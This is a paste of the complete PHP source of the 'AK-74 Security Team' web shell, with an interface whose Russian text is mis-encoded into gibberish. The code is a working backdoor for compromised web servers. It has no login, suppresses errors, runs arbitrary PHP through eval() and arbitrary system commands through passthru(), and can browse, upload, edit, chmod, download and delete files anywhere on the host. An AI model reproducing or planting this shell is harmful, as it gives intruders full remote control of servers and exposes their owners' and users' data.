ak74 web shell cooding

SUBMITTED BY: nabz

DATE: Jan. 25, 2017, 4:35 p.m.

FORMAT: Text only

SIZE: 20.5 kB

Raw Download

HITS: 172

Report
  1. <?
  3. /*
  5. .:: :[AK-74 Security Team Web Shell Beta Version]: ::.
  7. - AK-74 Security Team Web Site: www.ak74-team.net
  9. - Released on 01 June 2006.
  11. - Copyright AK-74 Security Team, 2006.
  13. - Thank you for using our script.
  15. */
  17. error_reporting(0);
  19. set_time_limit(0);
  21. session_start();
  23. $xshell = $SERVER_['PHP_SELF'];
  25. class shell
  27. {
  29. function getfiles()
  31. {
  33. $mas = array();
  35. $i = 0;
  37. if ($handle = opendir($_SESSION['currentdir']))
  39. {
  41. while (false !== ($file = readdir($handle)))
  43. if ($file != '..')
  45. if (!is_dir($_SESSION['currentdir'].'/'.$file))
  47. {
  49. $mas[$i]['filename'] = $file;
  51. $mas[$i]['filesize'] = filesize($_SESSION['currentdir'].'/'.$file);
  53. $mas[$i]['lastmod'] = date("H.i/d.m.Y", filemtime($_SESSION['currentdir'].'/'.$file));
  55. $i++;
  57. }
  59. closedir($handle);
  61. }
  63. return $mas;
  65. }
  67. function getdirs()
  69. {
  71. $mas = array();
  73. if ($handle = opendir($_SESSION['currentdir']))
  75. {
  77. while (false !== ($dir = readdir($handle)))
  79. if ($dir != '.' && is_dir($_SESSION['currentdir'].'/'.$dir))
  81. $mas[] = $dir;
  83. closedir($handle);
  85. }
  87. return $mas;
  89. }
  91. function geturl()
  93. {
  95. if ($_SESSION['currentdir'].'/' == $_SERVER['DOCUMENT_ROOT'])
  97. return '/';
  99. if (strpos($_SESSION['currentdir'],str_replace('\\','/',$_SERVER['DOCUMENT_ROOT'])) === false)
  101. return '';
  103. return str_replace($_SERVER['DOCUMENT_ROOT'],'',$_SESSION['currentdir'].'/');
  105. }
  107. function removefile()
  109. {
  111. if (file_exists($_GET['file']))
  113. {
  115. chmod($_GET['file'],0777);
  117. if (unlink($_GET['file']))
  119. return 'Ôàéë óäàëåí!';
  121. else
  123. return 'Ôàéë óäàëåí!';
  125. }
  127. else
  129. return 'Ôàéë íå íàéäåí!';
  131. }
  133. function removedir()
  135. {
  137. chmod($_GET['dir'],0777);
  139. if (rmdir($_GET['dir']))
  141. return 'Äèðåêòîðèÿ óäàëåíà!';
  143. else
  145. return 'Äèðåêòîðèÿ íå íàéäåía!';
  147. }
  149. function getmicrotime()
  151. {
  153. list($usec, $sec) = explode(" ",microtime());
  155. return ((float)$usec + (float)$sec);
  157. }
  159. function getpermission($path)
  161. {
  163. $perms = fileperms($path);
  165. if (($perms & 0xC000) == 0xC000)
  167. $info = 's';
  169. elseif (($perms & 0xA000) == 0xA000)
  171. $info = 'l';
  173. elseif (($perms & 0x8000) == 0x8000)
  175. $info = '-';
  177. elseif (($perms & 0x6000) == 0x6000)
  179. $info = 'b';
  181. elseif (($perms & 0x4000) == 0x4000)
  183. $info = 'd';
  185. elseif (($perms & 0x2000) == 0x2000)
  187. $info = 'c';
  189. elseif (($perms & 0x1000) == 0x1000)
  191. $info = 'p';
  193. else
  195. $info = 'u';
  197. $info .= (($perms & 0x0100) ? 'r' : '-');
  199. $info .= (($perms & 0x0080) ? 'w' : '-');
  201. $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
  203. $info .= (($perms & 0x0020) ? 'r' : '-');
  205. $info .= (($perms & 0x0010) ? 'w' : '-');
  207. $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
  209. $info .= (($perms & 0x0004) ? 'r' : '-');
  211. $info .= (($perms & 0x0002) ? 'w' : '-');
  213. $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
  215. return $info;
  217. }
  219. function getpermissionarray($path)
  221. {
  223. $res = array();
  225. $perms = fileperms($path);
  227. if (($perms & 0xC000) == 0xC000)
  229. $res[] = 's';
  231. elseif (($perms & 0xA000) == 0xA000)
  233. $res[] = 'l';
  235. elseif (($perms & 0x8000) == 0x8000)
  237. $res[] = '-';
  239. elseif (($perms & 0x6000) == 0x6000)
  241. $res[] = 'b';
  243. elseif (($perms & 0x4000) == 0x4000)
  245. $res[] = 'd';
  247. elseif (($perms & 0x2000) == 0x2000)
  249. $res[] = 'c';
  251. elseif (($perms & 0x1000) == 0x1000)
  253. $res[] = 'p';
  255. else
  257. $res[] = 'u';
  259. $res[] = (($perms & 0x0100) ? 'r' : '-');
  261. $res[] = (($perms & 0x0080) ? 'w' : '-');
  263. $res[] = (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
  265. $res[] = (($perms & 0x0020) ? 'r' : '-');
  267. $res[] = (($perms & 0x0010) ? 'w' : '-');
  269. $res[] = (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
  271. $res[] = (($perms & 0x0004) ? 'r' : '-');
  273. $res[] = (($perms & 0x0002) ? 'w' : '-');
  275. $res[] = (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
  277. return $res;
  279. }
  281. function outputhead()
  283. {
  285. $res = '';
  287. $res .= '<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"></head>
  289. <body>
  291. <STYLE>
  293. A:link {
  295. COLOR: #4d6d91; TEXT-DECORATION: underline
  297. }
  299. A:active {
  301. COLOR: #4d6d91; TEXT-DECORATION: underline
  303. }
  305. A:visited {
  307. COLOR: #4d6d91; TEXT-DECORATION: underline
  309. }
  311. A:hover {
  313. COLOR: #C10000; TEXT-DECORATION: underline
  315. }
  317. TD {
  319. FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica
  321. }
  323. BODY {
  325. FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc;
  327. }
  329. </STYLE>
  331. <div align="center"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">
  333. <tr>
  335. <td colspan=7 align="center">
  337. <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
  339. </td>
  341. </tr>';
  343. return $res;
  345. }
  347. function outputmenu()
  349. {
  351. $res = '';
  353. $res .= '<tr>
  355. <td colspan=7 align="center">
  357. <table border=0 cellspacing=0 cellpadding=0>
  359. <tr align="center">
  361. <td width=150>
  363. <a href="'.$xshell.'?act=info">Îáùàÿ èíôîðìàöèÿ</a>
  365. </td>
  367. <td width=150>
  369. <a href="'.$xshell.'?act=filemanager">Ôàéëîâûé ìåíåäæåð</a>
  371. </td>
  373. <td width=80>
  375. <a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
  377. </td>
  379. <td width=110>
  381. <a href="'.$xshell.'?act=execute">Âûïîëíèòü PHP</a>
  383. </td>
  385. <td width=150>
  387. <a href="'.$xshell.'?act=exesys">Âûïîëíèòü êîìàíäó</a>
  389. </td>
  391. </tr>
  393. </table>
  395. </td>
  397. </tr>';
  399. return $res;
  401. }
  403. function outputdown()
  405. {
  407. $res = '';
  409. $res .= '</table></div></body></html>';
  411. return $res;
  413. }
  415. function outputfilemanager()
  417. {
  419. $res = '';
  421. $number = 0;
  423. $dirs = $this->getdirs();
  425. $files = $this->getfiles();
  427. sort($dirs);
  429. sort($files);
  431. $res .= '
  433. <tr>
  435. <td colspan=7 align="center">
  437. <font color=#830000> Òåêóùàÿ äèðåêòîðèÿ:</font><b><font color=#830000>'.$_SESSION['currentdir'].'</font></b>
  439. </td>
  441. </tr>
  443. <tr align="center">
  445. <td width=30>
  447. &nbsp;
  449. </td>
  451. <td width=330>
  453. &nbsp;
  455. </td>
  457. <td width=80><font color=#830000>Ðàçìåð,</font> <b><font color=#830000>áàéò</font></b>
  459. &nbsp;
  461. </td>
  463. <td width=120><font color=#830000>
  465. Ïîñëåäíåå èçìåíåíèå
  467. </font>
  469. </td>
  471. <td width=80 align="center"><font color=#830000>Ïðàâà äîñòóïà</font>
  473. &nbsp;
  475. </td>
  477. <td width=30>
  479. &nbsp;
  481. </td>
  483. <td width=30>
  485. &nbsp;
  487. </td>
  489. </tr>';
  491. for ($i = 0; $i < count($dirs); $i++)
  493. {
  495. $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td><td><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b></td><td>&nbsp;</td><td>&nbsp;</td><td>';
  497. $res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
  499. $res .= '</td><td>&nbsp;</td><td><a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a></td></tr>';
  501. }
  503. for ($i = 0; $i < count($files); $i++)
  505. {
  507. $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td>';
  509. $res .= '<td><a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a></td>';
  511. $res .= '<td>&nbsp;&nbsp;'.$files[$i]['filesize'].'</td>';
  513. $res .= '<td align="center">'.$files[$i]['lastmod'].'</td>';
  515. $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a></td>';
  517. $res .= '<td align="center"><a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a></td>';
  519. $res .= '<td align="center"><a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a></td></tr>';
  521. }
  523. $res .= '</table><br>';
  525. $res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
  527. $res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>Ñîçäàòü äèðåêòîðèþ:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
  529. $res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>Ñîçäàòü ôàéë:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="Ñîçäàòü"></form></td></tr>';
  531. $res .= '<tr><td align=center><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>Çàêà÷àòü ôàéë:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>è ïðèñâîèòü èìÿ</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="Âïåð¸ä"></form></td></tr>';
  533. $res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
  535. $res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  537. return $res;
  539. }
  541. function outputinfo()
  543. {
  545. $res = '';
  547. $res .= '<tr>
  549. <td align="center" colspan=7>
  551. <b><font color=#83000>Îáùàÿ èíôîðìàöèÿ î ñåðâåðå</font></b>
  553. </td>
  555. </tr>
  557. <tr>
  559. <td colspan=7 align="left"><br>
  561. <ol>
  563. <b><font color=#830000>1. OS - </font></b><font color=#830000>'.(php_uname()).'</font><br><br>
  565. <b><font color=#830000>2. Âåðñèÿ PHP - </font></b><font color=#830000>'.(phpversion()).'</font><br><br>
  567. <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - '.( get_current_user()).' <b><font color=#830000>|| User ID</font></b> - '.( getmyuid()).' <b><font color=#830000>|| Group ID</b></font> - '.( getmygid ()).'</font><br><br>
  569. <b><font color=#830000>4. Server Software - </font></b><font color=#830000>'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
  571. <b><font color=#830000>5. Request Method - </font></b><font color=#830000>'.(getenv('REQUEST_METHOD')).'</font><br><br>
  573. <b><font color=#830000>6. Server IP - </font></b><font color=#830000>'.(getenv('SERVER_ADDR')).'</font><br><br>
  575. <b><font color=#830000>7. Your IP - </font></b><font color=#830000>'.(getenv('REMOTE_ADDR')).'</font><br><br>
  577. <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
  579. </td>
  581. </tr>
  583. <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
  585. <tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  587. return $res;
  589. }
  591. function chmodform($file)
  593. {
  595. $perms = $this->getpermissionarray($file);
  597. $res = '';
  599. $res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">'
  601. .'<input type="hidden" name="file" value="'.$file.'">
  603. <tr>
  605. <td align="center" colspan=7>
  607. <b><font color=#83000>Èçìåíåíèå ïðàâ äîñòóïà</font></b>
  609. </td>
  611. </tr>
  613. <tr>
  615. <td colspan=7 align="center">
  617. <table border=1 cellspacing=0 cellpadding=0>';
  619. $res .= '<tr align="center"><td>&nbsp;</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
  621. $res .= '<tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td>';
  623. for ($i = 1; $i <= 9; $i++)
  625. $res .= '<td><input type="checkbox" name="perms'.$i.'"'.(($perms[$i] != '-') ? ' checked' : '' ).'></td>';
  627. $res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="Ñîõðàíèòü"></td></tr>';
  629. $res .= '</table></td></tr></form>';
  631. return $res;
  633. }
  635. function editfileform($file)
  637. {
  639. $fp = fopen($file,'r');
  641. if (!$fp)
  643. return 'Ðåäàêòèðîâàíèå ôàéëà';
  645. $res = '';
  647. $res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">'
  649. .'<input type="hidden" name="file" value="'.$file.'"><tr>
  651. <td align="center" colspan=7>
  653. <b><font color=#83000>Ðåäàêòèðîâàíèå ôàéëà</font></b>
  655. </td>
  657. </tr>
  659. <tr>
  661. <td colspan=7 align="center">
  663. <table border=1 cellspacing=0 cellpadding=0>';
  665. $res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr>';
  667. $res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value='.$file.'> - <input type="submit" value="Ðåäàêòèðîâàòü"></td></tr>';
  669. $res .= '</table></td></tr></form>';
  671. fclose($fp);
  673. return $res;
  675. }
  677. function executeform()
  679. {
  681. $res = '';
  683. $res .= '<form action="'.$xshell.'?act=execute" method="post"><input type="hidden" name="action" value="execute">
  685. <tr>
  687. <td align="center" colspan=7>
  689. <b><font color=#83000>Âûïîëíåíèå PHP-êîäà<br> Îòêðûòèå è çàêðûòèå PHP êîäà ( &lt;? è ?> ) ïèñàòü íå íóæíî!</font></b>
  691. </td>
  693. </tr>
  695. <tr>
  697. <td colspan=7 align="center">
  699. <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
  701. $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
  703. <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
  705. <tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  707. return $res;
  709. }
  711. function execute()
  713. {
  715. echo "<hr>";
  717. echo "<pre>";
  719. eval(stripslashes($_POST['phpcode']));
  721. echo "</pre>";
  723. echo "<hr>";
  725. }
  727. function exesysform()
  729. {
  731. $res = '';
  733. $res .= '<form action="'.$xshell.'?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
  735. <tr>
  737. <td align="center" colspan=7>
  739. <b><font color=#83000>Execute system commands!</font></b>
  741. </td>
  743. </tr>
  745. <tr>
  747. <td colspan=7 align="center">
  749. <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
  751. $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="Âûïîëíèòü"></td></tr></table></td></tr>
  753. <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
  755. <tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
  757. return $res;
  759. }
  761. function exesys()
  763. {
  765. echo "<hr>";
  767. echo "<pre>";
  769. $result = passthru($_POST['cmmd']);
  771. echo "</pre>";
  773. echo "<hr>";
  775. }
  777. function editfile($file)
  779. {
  781. if (!empty($_POST['rename'])) {
  783. rename ($_POST['file'], $_POST['rename']);
  785. }
  787. $fp = fopen($_POST['rename'],'w');
  789. if (!$fp)
  791. return 0;
  793. fwrite($fp, stripslashes($_POST['filecontent']));
  795. fclose($fp);
  797. return 1;
  799. }
  801. function chmodfile($file)
  803. {
  805. $res = 0;
  807. switch ($_POST['perms0'])
  809. {
  811. case 's':
  813. $res = $res | 0xC000;
  815. break;
  817. case 'l':
  819. $res = $res | 0xA000;
  821. break;
  823. case '-':
  825. $res = $res | 0x8000;
  827. break;
  829. case 'b':
  831. $res = $res | 0x6000;
  833. break;
  835. case 'd':
  837. $res = $res | 0x4000;
  839. break;
  841. case 'c':
  843. $res = $res | 0x2000;
  845. break;
  847. case 'p':
  849. $res = $res | 0x1000;
  851. break;
  853. case 'u':
  855. break;
  857. }
  859. if (isset($_POST['perms1']))
  861. $res = $res | 0x0100;
  863. if (isset($_POST['perms2']))
  865. $res = $res | 0x0080;
  867. if (isset($_POST['perms3']))
  869. $res = $res | 0x0040;
  871. if (isset($_POST['perms4']))
  873. $res = $res | 0x0020;
  875. if (isset($_POST['perms5']))
  877. $res = $res | 0x0010;
  879. if (isset($_POST['perms6']))
  881. $res = $res | 0x0008;
  883. if (isset($_POST['perms7']))
  885. $res = $res | 0x0004;
  887. if (isset($_POST['perms8']))
  889. $res = $res | 0x0002;
  891. if (isset($_POST['perms9']))
  893. $res = $res | 0x0001;
  895. echo substr(sprintf('%o', $res), -4);
  897. return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
  899. }
  901. function downloadfile($file)
  903. {
  905. header ("Content-Type: application/octet-stream");
  907. header ("Content-Length: " . filesize($file));
  909. header ("Content-Disposition: attachment; filename=$file");
  911. readfile($file);
  913. die();
  915. }
  917. function createdir()
  919. {
  921. if (!empty($_POST['dircreate']))
  923. if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
  925. return 'Äèðåêòîðèÿ ñîçäàíà!';
  927. return 'Îøèáêà ïðè ñîçäàíèè äèðåêòîðèè';
  929. }
  931. function createfile()
  933. {
  935. if (!empty($_POST['filecreate']))
  937. {
  939. if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
  941. return 'Ôàéë óæå ñóùåñòâóåò';
  943. $fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
  945. if ($fp)
  947. {
  949. fclose($fp);
  951. return 'Ôàéë ñîçäàí!';
  953. }
  955. }
  957. return 'Îøèáêà ïðè ñîçäàíèè ôàéëà';
  959. }
  961. function uploadfile()
  963. {
  965. if ($_FILES['filename']['error'] != 0)
  967. return '121212';
  969. $_POST['filename2'] = trim($_POST['filename2']);
  971. if (empty($_POST['filename2']))
  973. $_POST['filename2'] = $_FILES['filename']['name'];
  975. if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
  977. if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
  979. return 'Çàêà÷êà ôàéëà íå âûïîëíåíà...';
  981. return 'Çàêà÷êà ôàéëà ïðîèçâåäåíà óñïåøíî!';
  983. }
  985. }
  987. $shell = new shell();
  989. $timestart = $shell->getmicrotime();
  991. $content = '';
  993. if (!isset($_SESSION['currentdir']))
  995. $_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
  997. if (isset($_GET['dir']))
  999. {
  1001. if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
  1003. $_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
  1005. Header("Location: $xshell?act=filemanager");
  1007. }
  1009. $_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
  1011. if (substr($_SESSION['currentdir'],-1,1) == '/')
  1013. $_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
  1015. switch ($_POST['action'])
  1017. {
  1019. case 'chmod':
  1021. if($shell->chmodfile($_POST['file']))
  1023. $content .= 'Ñìåíà ïðàâ ïðîèçîøëà óñïåøíî';
  1025. break;
  1027. case 'editfile':
  1029. if ($shell->editfile($_POST['file']))
  1031. $content .= 'Ðåäàêòèðîâàíèå ïðîèçîøëî óñïåøíî';
  1033. break;
  1035. case 'execute':
  1037. $shell->execute();
  1039. break;
  1041. case 'exesys':
  1043. $shell->exesys();
  1045. break;
  1047. case 'mkdir':
  1049. $content .= $shell->createdir();
  1051. break;
  1053. case 'createfile':
  1055. $content .= $shell->createfile();
  1057. break;
  1059. case 'uploadfile':
  1061. $content .= $shell->uploadfile();
  1063. break;
  1065. }
  1067. $content .= $shell->outputhead();
  1069. $content .= $shell->outputmenu();
  1071. switch ($_GET['act'])
  1073. {
  1075. case 'edit':
  1077. $content .= $shell->editfileform($_GET['file']);
  1079. break;
  1081. case 'chmod':
  1083. $content .= $shell->chmodform($_GET['file']);
  1085. break;
  1087. case 'down':
  1089. $content .= $shell->downloadfile($_GET['file']);
  1091. break;
  1093. case 'filemanager':
  1095. if ($_GET['act2'] == 'del')
  1097. $content .= $shell->removefile();
  1099. $content .= $shell->outputfilemanager();
  1101. if ($_GET['act3'] == 'del')
  1103. $content .= $shell->removedir();
  1105. break;
  1107. case 'phpinfo':
  1109. phpinfo();
  1111. die();
  1113. break;
  1115. case 'info':
  1117. $content .= $shell->outputinfo();
  1119. break;
  1121. case 'execute':
  1123. $content .= $shell->executeform();
  1125. break;
  1127. case 'exesys':
  1129. $content .= $shell->exesysform();
  1131. break;
  1133. }
  1135. $content .= $shell->outputdown();
  1137. echo $content;
  1139. echo '<center>Âðåìÿ ãåíåðàöèè: '.($shell->getmicrotime()-$timestart).'</center>';
  1141. ?>
comments powered by Disqus